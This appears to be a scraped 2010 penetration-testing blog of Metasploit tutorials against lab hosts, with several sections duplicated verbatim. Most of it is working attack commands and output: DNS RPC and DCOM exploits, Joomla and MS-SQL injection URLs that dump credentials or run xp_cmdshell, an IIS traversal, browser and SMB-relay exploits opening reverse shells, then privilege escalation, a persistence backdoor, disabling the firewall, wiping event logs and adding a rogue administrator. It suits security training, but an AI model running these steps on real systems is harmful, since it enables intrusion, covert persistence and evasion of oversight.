OpenVAS Vulnerability Scanner is one of the world most advanced Open Source vulnerability scanner available today. For some reasons, you might find that the OpenVAS server (openvassd) didn't run properly as expected after loading all plugins.
To check OpenVAS Client & Server connection, we can issue this command:
root@bt:/usr/local/sbin# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
cupsd 5491 root 2u IPv4 18281 TCP localhost:ipp (LISTEN)
nessusd 5759 root 4u IPv4 18917 TCP *:nessus (LISTEN)
nessusd 5759 root 6u IPv6 18920 TCP *:nessus (LISTEN)
nessusd 5759 root 8u IPv4 19018 TCP *:8834 (LISTEN)
dhclient 6245 root 5u IPv4 22498 UDP *:bootpc
openvassd 30053 root 4u IPv6 61325 TCP *:9390 (LISTEN)
OpenVAS-C 30065 root 5u IPv4 61625 TCP localhost:52713->localhost:9390 (ESTABLISHED)
openvassd 30069 root 6u IPv6 61346 TCP localhost:9390->localhost:52713 (ESTABLISHED)
OpenVAS server listens on TCP port 9390 by default.
Monday, December 6, 2010
Tuesday, November 23, 2010
PenTest Challenge (131.107.1.250)
Solutions
1. MS-DNS RPC Vulnerability (MS07-029)
msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit
2. SQL Injection Vulnerability in Joomla Component (Amblog)
Link: http://www.exploit-db.com/exploits/14596/
http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version
http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
1. MS-DNS RPC Vulnerability (MS07-029)
msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit
2. SQL Injection Vulnerability in Joomla Component (Amblog)
Link: http://www.exploit-db.com/exploits/14596/
http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version
http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
Monday, November 22, 2010
IDS Testing (Samples)
TEST-BT4 = 131.107.1.252, DEN-WEB1 = 131.107.1.101, DEN-WEB2 = 131.107.1.254, LON-IDS1 = 131.107.1.126
From TEST-BT4, launch these commands:
Anomaly Test
ping -s 65000 131.107.1.254
Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254
Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt
http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess
IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--
Exploit Test
cd /pentest/exploits/framework3
./msfconsole
msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Evading IDS Detection using Slow/Sneaky Scan Test
nmap -sS -PN -p80,443 -T1 131.107.1.254
From TEST-BT4, launch these commands:
Anomaly Test
ping -s 65000 131.107.1.254
Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254
Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt
http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess
IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--
Exploit Test
cd /pentest/exploits/framework3
./msfconsole
msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Evading IDS Detection using Slow/Sneaky Scan Test
nmap -sS -PN -p80,443 -T1 131.107.1.254
Monday, November 15, 2010
Metasploit Autopwn with Nessus
Use SQLite3 database driver
msf > db_driver sqlite3
Create "pentest" database
msf > db_create pentest
Import Nessus scan result
msf > db_import /tmp/131_107_1_101_scan.nessus
Display matching exploit modules
msf > db_autopwn -t -x
Launch matching exploits
msf > db_autopwn -e -x -r
Display open sessions
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:34013 -> 131.107.1.101:1063
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:14816 -> 131.107.1.101:1064
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:20971 -> 131.107.1.101:1065
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:5517 -> 131.107.1.101:1066
5 meterpreter x86/win32 DEN-WEB1\IUSR_MICROSOF-3UK0WZ @ DEN-WEB1 131.107.1.252:8837 -> 131.107.1.101:1068
msf > sessions -l
msf > sessions -i 1
msf > db_driver sqlite3
Create "pentest" database
msf > db_create pentest
Import Nessus scan result
msf > db_import /tmp/131_107_1_101_scan.nessus
Display matching exploit modules
msf > db_autopwn -t -x
Launch matching exploits
msf > db_autopwn -e -x -r
Display open sessions
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:34013 -> 131.107.1.101:1063
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:14816 -> 131.107.1.101:1064
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:20971 -> 131.107.1.101:1065
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:5517 -> 131.107.1.101:1066
5 meterpreter x86/win32 DEN-WEB1\IUSR_MICROSOF-3UK0WZ @ DEN-WEB1 131.107.1.252:8837 -> 131.107.1.101:1068
msf > sessions -l
msf > sessions -i 1
Tuesday, September 28, 2010
Tutorial: Exploiting IE with Windows Animated Cursor Vulnerability (MS07-017)
Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Create a resource file in /sources directory
root@bt:~# nano /sources/ie_ani
Enter the following as the contents of ie_ani file.
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.252
set SRVPORT 80
set LHOST 192.168.1.252
set LPORT 443
set URIPATH /you_win
exploit
Press Ctrl-X and Y, then press Enter to save the file.
Step 2: Launch Metasploit from its working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /sources/ie_ani
resource (/sources/ie_ani)> use windows/browser/ms07_017_ani_loadimage_chunksize
resource (/sources/ie_ani)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/sources/ie_ani)> set SRVHOST 192.168.1.252
SRVHOST => 192.168.1.252
resource (/sources/ie_ani)> set SRVPORT 80
SRVPORT => 80
resource (/sources/ie_ani)> set LHOST 192.168.1.252
LHOST => 192.168.1.252
resource (/sources/ie_ani)> set LPORT 443
LPORT => 443
resource (/sources/ie_ani)> set URIPATH /you_win
URIPATH => /you_win
resource (/sources/ie_ani)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.252:443
[*] Using URL: http://192.168.1.252:80/you_win
[*] Server started.
Step 3: Launch Internet Explorer (IE) on your target machine
Type the following in the URL:
http://192.168.1.252/you_win
Switch to your machine. Check if you've got the connection from your target.
Once connected, you can continue interact with Meterpreter
msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.50:1162...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.50:1162...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1163) at Wed Sep 29 12:08:22 +0800 2010
Press Enter to check the opened sessions.
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\testuser @ LON-CL1 192.168.1.252:443 -> 192.168.1.50:1163
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0
Check our privilege level
meterpreter > getuid
Server username: LON-CL1\testuser
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[-] core_channel_open: Operation failed: 5
Escalate our privilege
meterpreter > run kitrap0d
[*] Currently running as LON-CL1\testuser
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\LnZbxqeuZgMB.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1316)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x285ee bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 180
[?] OpenProcess(180) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[*] uploaded : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt
Maintain access by uploading Meterpreter agent
meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back
[-] Error in script: LocalJumpError unexpected return
meterpreter > run persistence -A -X -p 443 -r 192.168.1.252
[*] Creating a persistent agent: LHOST=192.168.1.252 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613927 bytes long
[*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs
[*] Agent executed with PID 1732
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc
Exit from the target system.
meterpreter > exit
Step 4: Create a listener on our machine
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.252
LHOST => 192.168.1.252
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.252:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1176) at Wed Sep 29 12:30:27 +0800 2010
Clearing tracks (housekeeping)
meterpreter > run disable_audit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies
OPTIONS:
-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.
meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Internal firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] External firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...
meterpreter > clearev
[*] Wiping 942 records from Application...
[*] Wiping 1984 records from System...
[*] Wiping 1 records from Security...
Enabling and Accessing Remote Desktop
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc
meterpreter > shell
Process 820 created.
Channel 18 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.
C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\Documents and Settings\testuser\Desktop>^C
Terminate channel 18? [y/N] y
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0
meterpreter >
Remote Desktop Connection
Open a new shell console, and run Remote Desktop client to connect to the target machine.
root@bt:~# rdesktop 192.168.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Create a resource file in /sources directory
root@bt:~# nano /sources/ie_ani
Enter the following as the contents of ie_ani file.
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.252
set SRVPORT 80
set LHOST 192.168.1.252
set LPORT 443
set URIPATH /you_win
exploit
Press Ctrl-X and Y, then press Enter to save the file.
Step 2: Launch Metasploit from its working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /sources/ie_ani
resource (/sources/ie_ani)> use windows/browser/ms07_017_ani_loadimage_chunksize
resource (/sources/ie_ani)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/sources/ie_ani)> set SRVHOST 192.168.1.252
SRVHOST => 192.168.1.252
resource (/sources/ie_ani)> set SRVPORT 80
SRVPORT => 80
resource (/sources/ie_ani)> set LHOST 192.168.1.252
LHOST => 192.168.1.252
resource (/sources/ie_ani)> set LPORT 443
LPORT => 443
resource (/sources/ie_ani)> set URIPATH /you_win
URIPATH => /you_win
resource (/sources/ie_ani)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.252:443
[*] Using URL: http://192.168.1.252:80/you_win
[*] Server started.
Step 3: Launch Internet Explorer (IE) on your target machine
Type the following in the URL:
http://192.168.1.252/you_win
Switch to your machine. Check if you've got the connection from your target.
Once connected, you can continue interact with Meterpreter
msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.50:1162...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.50:1162...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1163) at Wed Sep 29 12:08:22 +0800 2010
Press Enter to check the opened sessions.
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\testuser @ LON-CL1 192.168.1.252:443 -> 192.168.1.50:1163
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0
Check our privilege level
meterpreter > getuid
Server username: LON-CL1\testuser
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[-] core_channel_open: Operation failed: 5
Escalate our privilege
meterpreter > run kitrap0d
[*] Currently running as LON-CL1\testuser
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\LnZbxqeuZgMB.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1316)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x285ee bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 180
[?] OpenProcess(180) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[*] uploaded : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt
Maintain access by uploading Meterpreter agent
meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i
-p
-r
[-] Error in script: LocalJumpError unexpected return
meterpreter > run persistence -A -X -p 443 -r 192.168.1.252
[*] Creating a persistent agent: LHOST=192.168.1.252 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613927 bytes long
[*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs
[*] Agent executed with PID 1732
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc
Exit from the target system.
meterpreter > exit
Step 4: Create a listener on our machine
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.252
LHOST => 192.168.1.252
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.252:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1176) at Wed Sep 29 12:30:27 +0800 2010
Clearing tracks (housekeeping)
meterpreter > run disable_audit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies
OPTIONS:
-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.
meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Internal firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] External firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...
meterpreter > clearev
[*] Wiping 942 records from Application...
[*] Wiping 1984 records from System...
[*] Wiping 1 records from Security...
Enabling and Accessing Remote Desktop
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc
meterpreter > shell
Process 820 created.
Channel 18 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.
C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\Documents and Settings\testuser\Desktop>^C
Terminate channel 18? [y/N] y
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0
meterpreter >
Remote Desktop Connection
Open a new shell console, and run Remote Desktop client to connect to the target machine.
root@bt:~# rdesktop 192.168.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16
Tutorial: NTLM Authentication Hijack with SMB Relay
Local Host: 192.168.1.252 (BackTrack 4 with Metasploit 3.x)
Target Host: 192.168.1.50 (Windows XP SP2 English)
Step 1: Prepare the SMB Exploit on Local Host
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > exploit
Step 2: Connect to the FAKE shared folder from the remote machine
\\192.168.1.252\shared\xxx.jpg
shared\xxx.jpg is a fake link
Step 3: Interact with the open session
Wait until you've got the connection from our target machine.
Once connected, wait for a few minutes, then press Enter.
Check the active sessions
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.252:443 -> 192.168.1.50:1118
Interact with active session# 1
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Target Host: 192.168.1.50 (Windows XP SP2 English)
Step 1: Prepare the SMB Exploit on Local Host
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > exploit
Step 2: Connect to the FAKE shared folder from the remote machine
\\192.168.1.252\shared\xxx.jpg
shared\xxx.jpg is a fake link
Step 3: Interact with the open session
Wait until you've got the connection from our target machine.
Once connected, wait for a few minutes, then press Enter.
Check the active sessions
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.252:443 -> 192.168.1.50:1118
Interact with active session# 1
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Monday, September 27, 2010
Tutorial: Metasploit Basic Usage
Change directory to /pentest/exploits/framework3
cd /pentest/exploits/framework3
Launch MSF Console (Command Line Interface)
./msfconsole
Interact with MSF Console
Display help
msf > help
Search for a specific pattern
msf > search iis
Display information about the exploit module
